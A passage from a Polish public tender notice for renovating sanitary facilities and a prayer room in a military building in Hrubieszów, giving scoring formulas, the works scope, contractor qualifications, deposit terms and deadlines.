Cmin<br/>CO = -------- x 80% x 100 punktów, gdzie:<br/> CB<br/>CO – liczba punktów uzyskanych przez ofertę badaną (po zaokrągleniu do dwóch miejsc po przecinku) w kryterium cena 80%<br/>Cmin – najniższa cena wśród ofert niepodlegających odrzuceniu<br/> CB – cena oferty badanej<br/>2)	Gwarancja – waga 20%, gdzie punkty wyliczane są wg następującego wzoru:<br/> GB <br/> GO = ---------- x 20 % x100 punktów, gdzie:<br/> GMAX<br/>GO - liczba punktów uzyskanych przez ofertę badaną (po zaokrągleniu do dwóch miejsc po przecinku) w kryterium gwarancja 20 % <br/>G B – zaproponowany okres gwarancji w ofercie badanej <br/>GMAX - najdłuższy zaproponowany okres gwarancji spośród ofert niepodlegających odrzuceniu<br/>2.	UWAGA:<br/>A.	Wykonawca udzieli gwarancji na wykonane roboty, okres obowiązywania gwarancji Wykonawca określi w pełnych miesiącach w złożonej ofercie.<br/>B.	Wskazany w ofercie okres gwarancji nie może być krótszy niż 24 miesiące <br/>i dłuższy niż 60 miesięcy.<br/>C.	W przypadku wskazania w ofercie terminu gwarancji krótszego niż 24 miesiące lub niewskazanie w ofercie terminu gwarancji w ogóle – oferta zostanie odrzucona.<br/>D.	W przypadku wskazania w ofercie terminu gwarancji dłuższego niż 60 miesięcy, do obliczeń w kryterium: gwarancja, zostanie przyjęty okres - 60 miesięcy.<br/>3.	Sposób wyboru najkorzystniejszej oferty:<br/>Najkorzystniejsza oferta = oferta z największą liczbą punktów LP<br/>LP = CO + GO <br/>gdzie: LP – wyliczona ilość punktów badanej oferty.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest na robota budowlana w zakresie 2 części: <br/>Część 2 – Remont sanitariatów w budynku nr 3 w kompleksie wojskowym w Hrubieszowie. <br/>Zakres prac: <br/>I.	ROBOTY SANITARNE<br/>a)	Wymiana przyłączy<br/>	Wykonanie wykopu pod ułożenie rur wodociągowych i kanalizacyjnych ,<br/>	Wykonanie przyłączy wodociągowego i kanalizacyjnego <br/>b)	Wymiana wewnętrznej sieci wodno kanalizacyjnej:<br/>	Wymiana pionów kanalizacyjnych<br/>	Wymiana rurociągów z tworzyw sztucznych<br/>	Wymiana zaworów odcinających<br/>c)	Remont sanitariatów:<br/>	Demontaż urządzeń sanitarnych, umywalek, misek ustępowych, pisuarów<br/>	Demontaż starej instalacji sanitarnej<br/>	Wykonanie rurociągów instalacji wodnej z rur PP dn 20/25<br/>	Demontaż starej instalacji centralnego ogrzewania wykonanej z rur stalowych wraz z armaturą zabezpieczającą;<br/>	Wykonanie podejść ciepłej i zimnej wody do armatury sanitarnej<br/>	Wykonanie wewnętrznego rurociągu z rur PCV 110, PCV 50<br/>	Wykonanie podejść kanalizacyjnych pod miskę ustępową WC fi110 umywalki, brodziki, pisuary fi 50<br/>	Montaż wywiewki kanalizacyjnej<br/>	Montaż misek ustępowych typu kompakt<br/>	Montaż pisuarów<br/>	Montaż kabin prysznicowych wraz z brodzikiem z tworzywa sztucznego<br/>	Montaż baterii umywalkowych<br/>	Montaż baterii prysznicowych<br/>	Montaż odpływów liniowych<br/>	Dostawa i montaż kabin WC z drzwiami w technologii lekkich ścianek działowych <br/>II.	ROBOTY BUDOWLANE<br/>a)	Roboty rozbiórkowe:<br/>	Skucie posadzki z płytek ceramicznych<br/>	Skucie licowania ścian wykonanej z płytek ceramicznych <br/>	Demontaż drzwi wewnętrznych płycinowych z ościeżnicą stalową<br/>	Rozebranie ścianek działowych<br/>	Wywóz gruzu z terenu budowy<br/>b)	Roboty ogólnobudowlane:<br/>	Naprawa tynków po skutych płytkach ceramicznych<br/>	Naprawa posadzki po skutych płytkach ceramicznych<br/>	Odgrzybianie powierzchni ścian środkiem grzybobójczym metodą natryskową<br/>	Wykonanie hydroizolacji posadzki oraz stref wilgotnych w natryskach za pomocą folii w płynie- naroża wewnętrzne zabezpieczone poprzez wklejenie taśmy elastomerowej <br/>	Gruntowanie powierzchni ścian pod licowanie ścian płytkami ceramicznymi<br/>	Ułożenie płytek na ścianach do wysokości 2m od poziomu posadzki<br/>	Przygotowanie podłoża pod ułożenie płytek ceramicznych na podłodze poprzez gruntowanie powierzchni<br/>	Wykonanie posadzki z płytek (gres) o wymiarach 30x30 cm lub zbliżonym.<br/>	Dostawa i montaż drzwi wewnętrznych, metalowe, z okleiną drewnopodobną, wymiary w świetle ościeżnicy wraz z ościeżnicą metalową w okleinie drewnopodobnej <br/>	Wykonanie ścianek działowej o grubości 12 cm z bloczków betonu komórkowego<br/>	Montaż kabin prysznicowych, WC w technologii ścianek działowych lekkich LTT<br/>	Wykonanie sufitów podwieszanych o konstrukcji stalowej z obłożeniem płytami gipsowo-kartonowymi,<br/>	Wykonanie gładzi gipsowych na pozostałej górnej części ścian w pomieszczeniach sanitariatów;<br/>	Dwukrotne malowanie tynków wewnętrznych ścian i sufitów farbą lateksową;<br/>III.	ROBOTY ELEKTRYCZNE<br/>a)	Wymiana instalacji elektrycznej	<br/>	Wykucie bruzd dla przewodów wtynkowych;<br/>	Montaż przewodów kabelkowych w bruzdach ;<br/>	Mechaniczne wykucie bruzd dla przewodów wtynkowych w ścianach z cegły pełnej, wykonanie przejść przez ściany (zaprawianie bruzd);<br/>	Montaż puszek instalacyjnych podtynkowych o śr. do 80 mm oraz do 60 mm;<br/>	Przewód płaski łączny przekrój żył do 7,5 mm2 układany w tynku [przewód YDYp 3x2,5 mm2];<br/>	Przewód płaski łączny przekrój żył do 7,5 mm2 układany w tynku [przewód YDYp 3x1,5 mm2];<br/>b)	Montaż osprzętu instalacyjnego<br/>	Montaż łączników instalacyjnych podtynkowych pojedynczych w puszce instalacyjnej z podłączeniem;<br/>	Montaż gniazd wtyczkowych pojedynczych z podłączeniem [gniazda p/t 2x2P+Z 10/16A 230V IP20, gn. p/t 2P+Z 10/16A 230V IP20]; montaż gniazd pojedynczych bryzgoszczelnych 2P+Z 10/16A 230V IP44]<br/>c)	Montaż opraw oświetleniowych<br/>	Montaż w sanitariacie, w suficie podwieszonym opraw oświetleniowych<br/>(z podłączeniem) [oprawa do wbudowania w suficie podwieszonym modułowa LED 840 40 W 4000 lm IP44];<br/>	Montaż z podłączeniem na gotowym podłożu oprawy oświetleniowej nad umywalką [oprawa LED o stopniu ochrony IP44, przeznaczona do zamontowania w sanitariacie]<br/>d)	Pozostałe roboty instalacyjne<br/>	Sprawdzenie i pomiar kompletnego 1-fazowego obwodu elektrycznego niskiego napięcia oraz sprawdzenie skuteczności działania wyłączników różnicowo-prądowych;<br/>IV.	REMONT POMIESZCZENIA SALI MODLITWY<br/>a)	Roboty budowlane<br/>	Wykonanie wylewki samopoziomującej <br/>	Wykonanie posadzki z wykładzin tworzyw sztucznych PCV<br/>	Wykonanie ścianek działowych z płyt G-K<br/>	Odgrzybianie ścian preparatami grzybobójczymi<br/>	Dwukrotne malowanie powierzchni ścian wewnętrznych<br/>	Dostawa i montaż drzwi wewnętrznych<br/>	Montaż 2 grzejników płytowych<br/>	Podłączenie grzejników poprzez przedłużenie instalacji CO wykonanej z rur stalowych<br/>b)	Roboty elektryczne<br/>	Wymiana opraw oświetleniowych<br/>	Wymiana tablicy bezpiecznikowej<br/>	Wymiana osprzętu modułowego <br/>	Mechaniczne przebijanie otworów w stropach i ścianach<br/>	Montaż rur elektroinstalacyjnych<br/>	Montaż puszek elektrycznych<br/>	Wymiana przewodów elektrycznych<br/>	Wymiana gniazd podtynkowych <br/>	Wymiana włączników <br/>	Montaż korytek kablowych<br/>	Wykonanie pomiarów elektrycznych<br/>SZCZEGÓŁOWY OPIS PRZEDMIOTU ZAMÓWIENIA OKREŚLAJĄ:<br/>W ZAKRESIE CZĘSCI NR 2:<br/>1)	Specyfikacja Techniczna Wykonania i Odbioru Robót (STWiOR) - stanowiąca Załącznik nr 2 do SWZ - w zakresie części nr 2.<br/>2)	Przedmiar robót –stanowiący Załącznik nr 2 a do SWZ w zakresie części nr 2. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45453000-7 - Roboty remontowe i renowacyjne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">90 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za ofertę najwyżej ocenioną zostanie uznana oferta zawierająca najkorzystniejszy bilans punktów przyznanych w następujących kryteriach:<br/>1)	Cena CO (w rozumieniu ceny brutto) - waga 80%, gdzie punkty wyliczane są wg następującego wzoru:<br/> Cmin<br/>CO = -------- x 80% x 100 punktów, gdzie:<br/> CB<br/>CO – liczba punktów uzyskanych przez ofertę badaną (po zaokrągleniu do dwóch miejsc po przecinku) w kryterium cena 80%<br/>Cmin – najniższa cena wśród ofert niepodlegających odrzuceniu<br/> CB – cena oferty badanej<br/>2)	Gwarancja – waga 20%, gdzie punkty wyliczane są wg następującego wzoru:<br/> GB <br/> GO = ---------- x 20 % x100 punktów, gdzie:<br/> GMAX<br/>GO - liczba punktów uzyskanych przez ofertę badaną (po zaokrągleniu do dwóch miejsc po przecinku) w kryterium gwarancja 20 % <br/>G B – zaproponowany okres gwarancji w ofercie badanej <br/>GMAX - najdłuższy zaproponowany okres gwarancji spośród ofert niepodlegających odrzuceniu<br/>2.	UWAGA:<br/>A.	Wykonawca udzieli gwarancji na wykonane roboty, okres obowiązywania gwarancji Wykonawca określi w pełnych miesiącach w złożonej ofercie.<br/>B.	Wskazany w ofercie okres gwarancji nie może być krótszy niż 24 miesiące <br/>i dłuższy niż 60 miesięcy.<br/>C.	W przypadku wskazania w ofercie terminu gwarancji krótszego niż 24 miesiące lub niewskazanie w ofercie terminu gwarancji w ogóle – oferta zostanie odrzucona.<br/>D.	W przypadku wskazania w ofercie terminu gwarancji dłuższego niż 60 miesięcy, do obliczeń w kryterium: gwarancja, zostanie przyjęty okres - 60 miesięcy.<br/>3.	Sposób wyboru najkorzystniejszej oferty:<br/>Najkorzystniejsza oferta = oferta z największą liczbą punktów LP<br/>LP = CO + GO <br/>gdzie: LP – wyliczona ilość punktów badanej oferty.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 3</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> zdolności technicznej lub zawodowej:<br/>W ZAKRESIE CZĘŚCI NR 1<br/>Zamawiający uzna, że Wykonawca spełnił ww. warunek – jeżeli wykaże, że:<br/>a)	posiada doświadczenie nabyte poprzez realizację robót budowlanych, odpowiadających swoim rodzajem robocie budowlanej objętej przedmiotem zamówienia publicznego, przez co Zamawiający rozumie wykonanie w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, co najmniej 1 (jednego) zamówienia polegającego na wykonaniu robót remontowo-budowlanych budynków na kwotę co najmniej 300 000,00 zł brutto, wraz z podaniem ich rodzaju, wartości daty i miejsca wykonania oraz podmiotów na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty. <br/>b)	skieruje do realizacji zamówienia:<br/>- co najmniej 1 osobę posiadającą uprawnienia budowlane <br/>do pełnienia samodzielnych funkcji technicznych w budownictwie <br/>w zakresie kierowania robotami o specjalności:<br/>	konstrukcyjno-budowlanej;<br/>	instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych;<br/>	instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych oraz przynależną do właściwej izby samorządu zawodowego – zgodnie z art. 14 ustawy z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2021 r., poz. 2351 tekst jednolity);<br/><br/>W ZAKRESIE CZĘŚCI NR 2<br/>Zamawiający uzna, że Wykonawca spełnił ww. warunek – jeżeli wykaże, że:<br/>a)	posiada doświadczenie nabyte poprzez realizację robót budowlanych, odpowiadających swoim rodzajem robocie budowlanej objętej przedmiotem zamówienia publicznego, przez co Zamawiający rozumie wykonanie w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, co najmniej 1 (jednego) zamówienia polegającego na wykonaniu robót remontowo-budowlanych budynków na kwotę co najmniej 300 000,00 zł brutto, wraz z podaniem ich rodzaju, wartości daty i miejsca wykonania oraz podmiotów na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty. <br/>c)	skieruje do realizacji zamówienia:<br/>- co najmniej 1 osobę posiadającą uprawnienia budowlane <br/>do pełnienia samodzielnych funkcji technicznych w budownictwie <br/>w zakresie kierowania robotami o specjalności:<br/>	konstrukcyjno-budowlanej;<br/>	instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych;<br/>	instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych oraz przynależną do właściwej izby samorządu zawodowego – zgodnie z art. 14 ustawy z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2021 r., poz. 2351 tekst jednolity); <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Potwierdzających brak podstaw do wykluczenia Wykonawcy z udziału <br/>w postępowaniu:<br/>W ZAKRESIE CZĘŚCI NR 1 i CZĘŚCI NR 2:<br/>1)	Informacja z Krajowego Rejestru Karnego w zakresie: <br/>a)	art. 108 ust. 1 pkt 1 i 2 ustawy z dnia 11 września 2019r. - Prawo zamówień publicznych;<br/>b)	art. 108 ust. 1 pkt 4 ustawy, dotyczącej orzeczenia zakazu ubiegania się <br/>o zamówienie publiczne tytułem środka karnego;<br/>c)	art. 109 ust. 1 pkt 3 ustawy, dotyczącej skazania za przestępstwo lub ukarania za wykroczenie, za które wymierzono karę aresztu; <br/>- sporządzonej nie wcześniej niż 6 miesięcy przed jej złożeniem.<br/>2)	Odpis lub Informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4) ustawy Pzp, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;<br/>3)	W celu potwierdzenia braku podstaw wykluczenia z udziału w postępowaniu w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp wykonawca winien złożyć - Oświadczenie w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 ze zm.), z innym Wykonawcą, który złożył odrębną ofertę lub ofertę częściową, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty lub oferty częściowej niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej. Oświadczenie należy złożyć z wykorzystaniem wzoru stanowiącego załącznik nr 10 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Potwierdzających spełnianie warunków udziału w postępowaniu dotyczących:<br/>W zakresie i części nr 1 i części nr 2: <br/>a)	WYKAZ ROBÓT budowlanych, wykonanych nie wcześniej niż <br/>w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty <br/>i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, <br/>- co najmniej 1 (jednego) zamówienia polegającego na wykonaniu robót remontowo-budowlanych budynków na kwotę co najmniej 300 000,00 zł brutto – wzór Wykazu Robót – stanowi Załącznik nr 8 do SWZ;<br/><br/>b)	DOWODY określające, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty;<br/><br/>c)	WYKAZ OSÓB skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych <br/>za kierowanie robotami budowlanymi, sanitarnymi, elektrycznymi wraz <br/>z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami tj.: <br/>- co najmniej 1 osobę posiadającą uprawnienia budowlane <br/>do pełnienia samodzielnych funkcji technicznych w budownictwie <br/>w zakresie kierowania robotami o specjalności:<br/>	konstrukcyjno-budowlanej;<br/>	instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych;<br/>	instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych oraz przynależną do właściwej izby samorządu zawodowego – zgodnie z art. 14 ustawy z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2021 r., poz. 2351 tekst jednolity);– wzór Wykazu osób - stanowi Załącznik nr 9 do SWZ</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Zobowiązanie podmiotu udostępniającego zasoby (jeżeli dotyczy danego wykonawcy) – zgodnie z art. 123 ustawy Pzp (składa się z ofertą)- Wykonawca nie może, po upływie terminu składania wniosków o dopuszczenie do udziału w postępowaniu albo ofert, powoływać się na zdolności lub sytuację podmiotów udostępniających zasoby, jeżeli na etapie składania wniosków o dopuszczenie do udziału w postępowaniu albo ofert nie polegał on w danym zakresie na zdolnościach lub sytuacji podmiotów udostępniających zasoby - Załącznik nr 6 do SWZ;<br/>Oryginał pełnomocnictwa w przypadku, gdy ofertę i załączniki podpisuje ustanowiony pełnomocnik. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Przystępując do postępowania każdy z Wykonawców zobowiązany jest do wniesienia wadium w wysokości: <br/>W zakresie części nr 1<br/>	3 500,00 zł /słownie: trzy tysiące pięćset 00/100 złotych/<br/>W zakresie części nr 2<br/>	5 400,00 zł /słownie: pięć tysięcy czterysta 00/100 złotych/<br/>2.	Wadium może być wnoszone w jednej lub w kilku następujących formach: <br/>1)	pieniądzu;<br/>2)	gwarancjach bankowych; <br/>3)	gwarancjach ubezpieczeniowych; <br/>4)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2019 r. poz. 310, 836 i 1572). <br/>3.	Wadium wniesione w pieniądzu wpłaca się przelewem z rachunku Wykonawcy na rachunek bankowy Zamawiającego nr konta 59 1010 1339 0057 5713 9120 2000 z dopiskiem: „Wadium w postępowaniu nr ZP/TP/31/2023 – Robota budowlana w zakresie części nr ….. .<br/>4.	Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, o których mowa w art. 97 ust. 7 pkt 2-4 ustawy Pzp, Wykonawca przekazuje Zamawiającemu oryginał gwarancji lub poręczenia w postaci elektronicznej.<br/>5.	Prawidłowo złożone wadium wnosi się przed upływem terminu składania ofert tj. do 19.07.2023 r. do godz.: 10:00. <br/>6.	Wniesienie wadium w pieniądzu następuje z chwilą uznania środków pieniężnych na rachunku bankowym Zamawiającego, o którym mowa w Rozdziale XIV pkt 3 SWZ, przed upływem terminu składania ofert (tj. przed upływem dnia i godziny wyznaczonej jako ostateczny termin składania ofert).<br/>UWAGA: dalszy zakres, charakter oraz warunki dotyczące wadium zostały określone w Rozdziale XIV SWZ <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku składania oferty przez wykonawców wspólnie ubiegających się <br/>o udzielenie zamówienia, oświadczenia i dokumenty wymienione w Rozdziale XII A pkt 4 ppkt 2) (oświadczenie), ppkt 7) (oświadczenie), XII B pkt 2 ppkt 1) (krk),, ppkt 2) (ewidencja), 3) (oświadczenie grupa kapitałowa) składa każdy z wykonawców.<br/>W przypadku składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia, zgodnie z art. 117 ustawy Pzp, gdy zamawiający wymaga posiadania uprawnień zawodowych czy też wykształcenia, kwalifikacji zawodowych lub doświadczenia, a warunki udziału w postępowaniu spełniają tylko poszczególni wykonawcy wspólnie ubiegający się o zamówienie, należy dołączyć do oferty oświadczenie, z którego wynikać będzie, jakie konkretne roboty budowlane/dostawy/usługi wykonają określeni wykonawcy – a więc kto co konkretnie zrobi w trakcie wykonywania zamówienia. (z treści oświadczenia winno wynikać, którą część zamówienia wykonają poszczególni wykonawcy wspólnie ubiegający się o udzielenie zamówienia – dotyczy również wspólników spółki cywilnej) – wzór stanowi załącznik nr 7 do SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zakres, charakter zmian oraz warunki wprowadzenia zmian zostały określone we wzorze umowy stanowiącym załącznik nr3 do SWZ (odpowiednio do danej części). <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-07-19 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://portal.smartpzp.pl/32wog</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-07-19 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-08-17</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: </h3> <p class="mb-0">Część 1 : <span class="normal">Tak</span></p> <p class="mb-0">Część 2 : <span class="normal">Tak</span></p> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> O udzielenie zamówienia publicznego mogą ubiegać się Wykonawcy, którzy:<br/>Nie podlegają wykluczeniu, w okolicznościach, o których mowa w art. 7 ust.1 Ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach <br/>w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz.U. z 2022 poz.835) tj.<br/>1.	Zgodnie z ustawą z dnia 13 kwietnia 2022r. (poz. 835) o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego - wykluczeniu podlegają osoby i podmioty wpisane na listę, wobec których stosowane są środki, o których mowa w art. 1, ustawy z dnia 13 kwietnia 2022r. (poz. 835) <br/>o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego, lista prowadzona przez ministra właściwego do spraw wewnętrznych. Lista publikowana jest w Biuletynie Informacji Publicznej na stronie podmiotowej ministra właściwego do spraw wewnętrznych. <br/>2.	W związku z art. 7 ustawy z dnia 13 kwietnia 2022r. (poz. 835) o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego z postępowania o udzielenie zamówienia publicznego lub konkursu prowadzonego na podstawie ustawy z dnia 11 września 2019 r – Prawo zamówień publicznych wyklucza się:<br/>1)	Wykonawcę wymienionego w wykazach określonych w Rozporządzeniu Rady (WE) 765/2006 i Rozporządzeniu (UE) 269/2014 albo wpisanego na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu wykluczenia z postępowania o zamówienie publiczne na podstawie ustawy Pzp;<br/>2)	Wykonawcę, którego beneficjentem rzeczywistym w rozumieniu ustawy z dnia 1 marca 2018 r., o przeciwdziałaniu praniu pieniędzy oraz finansowaniu terroryzmu (Dz. U. z 2022 r. poz. 593 i 655) jest osoba wymieniona w wykazach określonych w Rozporządzeniu Rady (WE) 765/2006 i Rozporządzeniu (UE) 269/2014 albo wpisana na listę lub będąca takim beneficjentem rzeczywistym od dnia 24 lutego 2022 r., o ile została wpisana na listę prowadzoną przez ministra właściwego do spraw wewnętrznych na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka wykluczenia z postępowania o zamówienie publiczne na podstawie ustawy 